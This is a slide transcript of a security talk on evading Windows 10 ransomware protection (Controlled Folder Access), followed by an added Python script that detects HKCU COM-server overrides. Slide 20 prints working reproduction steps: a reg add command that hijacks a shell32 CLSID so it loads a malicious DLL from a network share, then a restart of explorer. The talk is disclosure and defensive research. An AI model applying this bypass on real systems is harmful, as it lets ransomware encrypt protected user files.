
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10

The WannaCry cyber-attack that swept the world in May 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the "Ransomware protection" feature in the Windows 10 Fall Creators Update. How does this feature work? Is it really effective? In this talk, I will explain the operating principles of "Controlled folder access", part of "Ransomware protection", through a demonstration video. Then I will show the requirements for evading this feature and show that it can be evaded very easily. Finally, I will ask whether we may have to reconsider the definition of a vulnerability.

Published in: Software

  1. An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
  2. My Profile. 1992 ~ 2014: software developer of Windows. 2015 ~: security researcher (2016 AVTOKYO, 2017 BSides Las Vegas, 2018 GrrCON, 2018 ToorCon, 2018 DerbyCon). 2018 ~: BSides Tokyo Organizer (2018 first BSides in East Asia). SOYA AOYAMA: Researcher @ Fujitsu System Integration Laboratories Ltd; Fujitsu Security Meister, High Master, Global White hacker; Organizer @ BSides Tokyo
  3. May 12, 2017
  4. May 12, 2017
  5. Microsoft's answer to Ransomware
  6. TANMAY GANACHARYA, Principal Group Manager, Windows Defender Research. Ransomware protection on Windows 10: For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.
  7. The truth is …
  8. Windows system folders are NOT protected by default.
  9. The truth is …
  10. Microsoft ONLY knows.
  11. Ransomware protection mechanism [diagram labels: app folders, allowed apps, protected folders, Explorer, PowerShell, cmd, Word, System32, Documents, Pictures]
  12. You ain't heard nothin' yet!
  13. Simple idea [diagram labels: app folders, allowed apps, protected folders, cmd, Explorer, PowerShell, Word, System32, Documents, Pictures]
  14. YAGO JESUS, MICROSOFT ANTI RANSOMWARE BYPASS: By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner
  15. My method is …
  16. Only using a bat file
  17. • HKCR = HKLM\Software\Classes + HKCU\Software\Classes • HKLM\Software\Classes < HKCU\Software\Classes (in case of duplication)
  18. {90AA3A4E-1CBA-4233-B8BB-535773D48449} • HKLM\SOFTWARE\Classes\CLSID • HKCU\Software\Classes\CLSID
  19. [Diagram labels: HKCR, HKLM, HKCU, %SystemRoot%\system32\shell32.dll, \\Server\Share\Malicious.dll, Explorer.exe, Shell32.dll, Malicious.dll, User's Files, File encryption process, Sharing File]
  20. I submitted the vulnerability report to MSRC • Step-by-step instructions to reproduce the issue on a fresh install
      1. Put the malicious dll on shared file server. (\\10.0.1.40\share\Anti-ControlledFolderAccess.dll)
      2. Start the cmd.exe on target PC. (An administrator privilege is NOT required)
      3. Execute the following command.
      4. Start the procexp.exe on target PC.
      reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
      taskkill /IM explorer.exe /F
      start explorer.exe
  21. MSRC's answer was…
  22. How about other antimalware applications?
  23. No antimalware application can block my malware
  24. How to avoid it? Always check if malicious values are written in the registry.
  25. [Diagram labels: PC A, PC B, security boundary, MS17-010, security vulnerability, Ransomware protection, new boundary, Documents, Pictures, Videos, Music, Desktop, Favorites]
  26. We should reconsider the definition [diagram labels: PC A, PC B, security boundary, security vulnerability, Ransomware protection, security sub boundary, security sub vulnerability, Documents, Pictures, Videos, Music, Desktop, Favorites]
  27. https://www.facebook.com/soya.aoyama.3 @SoyaAoyama https://www.slideshare.net/SoyaAoyama
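
One way to run the registry check that slide 24 asks for, using the HKCU-over-HKLM precedence from slide 17. This is an added example, not code from the talk or from Microsoft. It assumes you have saved the English-language output of `reg query HKCU\Software\Classes\CLSID /s` and `reg query HKLM\SOFTWARE\Classes\CLSID /s` as text; the sample below is constructed, and its second CLSID and path are made up.

```python
import re

# Key lines for per-user or machine-wide COM server registrations.
SERVER_KEY = re.compile(
    r"^HKEY_(CURRENT_USER|LOCAL_MACHINE)\\Software\\Classes\\CLSID\\"
    r"(\{[0-9A-F-]{36}\})\\(InprocServer32|LocalServer32)$", re.I)
# The unnamed value of a key, as printed by an English-language reg.exe.
DEFAULT_VALUE = re.compile(r"^\s+\(Default\)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$")

# Constructed sample of `reg query <key> /s` output (second CLSID is made up).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\shell32.dll
    ThreadingModel    REG_SZ    Apartment
HKEY_CURRENT_USER\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32
    (Default)    REG_SZ    \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32
    (Default)    REG_SZ    C:\Users\alice\AppData\Local\ExampleApp\shellext.dll
"""

def parse_servers(reg_query_text):
    """Map (hive, CLSID, server key) to that key's default value."""
    servers, current = {}, None
    for line in reg_query_text.splitlines():
        if line.startswith("HKEY_"):
            m = SERVER_KEY.match(line.rstrip())
            current = (m[1].upper(), m[2].upper(), m[3].lower()) if m else None
        elif current and (v := DEFAULT_VALUE.match(line)):
            servers[current] = v[1]
    return servers

def find_overrides(reg_query_text):
    """Return HKCU COM servers that shadow HKLM or load from a UNC path."""
    servers = parse_servers(reg_query_text)
    findings = []
    for (hive, clsid, kind), path in sorted(servers.items()):
        if hive != "CURRENT_USER":
            continue
        machine = servers.get(("LOCAL_MACHINE", clsid, kind))
        reasons = []
        if machine is not None and machine.lower() != path.lower():
            reasons.append(f"shadows HKLM value {machine}")
        if path.startswith("\\\\"):
            reasons.append("loads from a UNC path")
        if reasons:
            findings.append((clsid, kind, path, reasons))
    return findings

if __name__ == "__main__":
    print(*find_overrides(SAMPLE), sep="\n")
```

Per-user COM registrations that neither shadow a machine-wide CLSID nor point at a network share are left unflagged, since legitimate per-user installers create them.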
